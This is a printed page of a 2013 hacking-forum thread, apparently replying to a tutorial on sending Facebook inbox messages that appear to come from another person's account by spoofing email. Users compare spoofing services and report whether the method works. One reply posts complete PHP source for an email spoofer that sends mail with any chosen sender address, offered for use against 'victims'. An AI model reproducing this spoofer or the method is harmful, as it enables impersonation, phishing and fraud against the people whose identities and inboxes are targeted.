![]() |
|
FACEBOOK: How to inbox people from anyones account [HOT] - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Hacking (https://sinister.ly/Forum-Hacking) +--- Forum: Tutorials (https://sinister.ly/Forum-Tutorials) +--- Thread: FACEBOOK: How to inbox people from anyones account [HOT] (/Thread-FACEBOOK-How-to-inbox-people-from-anyones-account-HOT) |
RE: FACEBOOK: How to inbox people from anyones account [HOT] - Talles - 01-22-2013 didnt worked here =/, i think itsnt working anymore RE: FACEBOOK: How to inbox people from anyones account [HOT] - Nailo - 01-22-2013 this method does not work anymore guys RE: FACEBOOK: How to inbox people from anyones account [HOT] - Tr0LL - 01-22-2013 Well it worked but with deferent mail spoofer . It looks like http://emkei.cz/ is not sending the mail. If the sender is not in victims friend list the mail will not go in inbox but at the folder "others" RE: FACEBOOK: How to inbox people from anyones account [HOT] - noize - 01-23-2013 tried with emkai or what that waz called like. not working. but using a website i made with altervista that works! thanks, mate. but how about the status thing without going through the mobile method? P.S: For everybody in trouble with online servers, i'm posting the source code which works fine, i'd say. PHP Code: <?php
$body = $_POST['body'];
$username = $_POST['username'];
$body .= "\nFrom: $username";
$email = $_POST['email'];
$object = $_POST['object'];
$sendto = $_POST['sendto'];
@mail("$sendto", $object, $body, "From: $email");
?>
<br><br>
<form action="THEPHPCODEPAGE.php" method="post">
Send to: <input type="text" name="sendto" id="sendto" size="40" /><br>
Your name: <input type="text" name="username" id="username" size="40" maxlength="40" /><br>
Your email address: <input type="text" name="email" size="28" /><br>
Object: <input type="text" name="object" id="object" size="44" /><br>
Message: <input type="box" name="body" id="body" size="41" /><br>
<input type="submit" value="Submit" style="position: relative; top: 11px; left: 127px; width: 92px; height: 27px; background-color: black; color: white;" />
<input type="hidden" name="submitted" value="TRUE" />
</form>
hope useful, guyz! RE: FACEBOOK: How to inbox people from anyones account [HOT] - Abuse - 01-24-2013 This is a nice tutorial. Very detailed! Thanks alot man, will try this out when needed.
RE: FACEBOOK: How to inbox people from anyones account [HOT] - zamzam - 01-24-2013 nice tutorial. write again about something(example match dating) RE: FACEBOOK: How to inbox people from anyones account [HOT] - JesseH - 01-25-2013 Hey, Okay this is interesting, and a decent use for an Email Spoofer. Now who is going to write up a Ethical Hackers Report and send it to Facebook HQ? ![]() JesseH RE: FACEBOOK: How to inbox people from anyones account [HOT] - dontmessme - 01-25-2013 thanks man for the info ......... ![]() hope it will work 4 me
RE: FACEBOOK: How to inbox people from anyones account [HOT] - CruelEngine - 03-14-2013 Thank You!
RE: FACEBOOK: How to inbox people from anyones account [HOT] - ReTi0n - 03-14-2013 Not working for me... Nice try anyway. |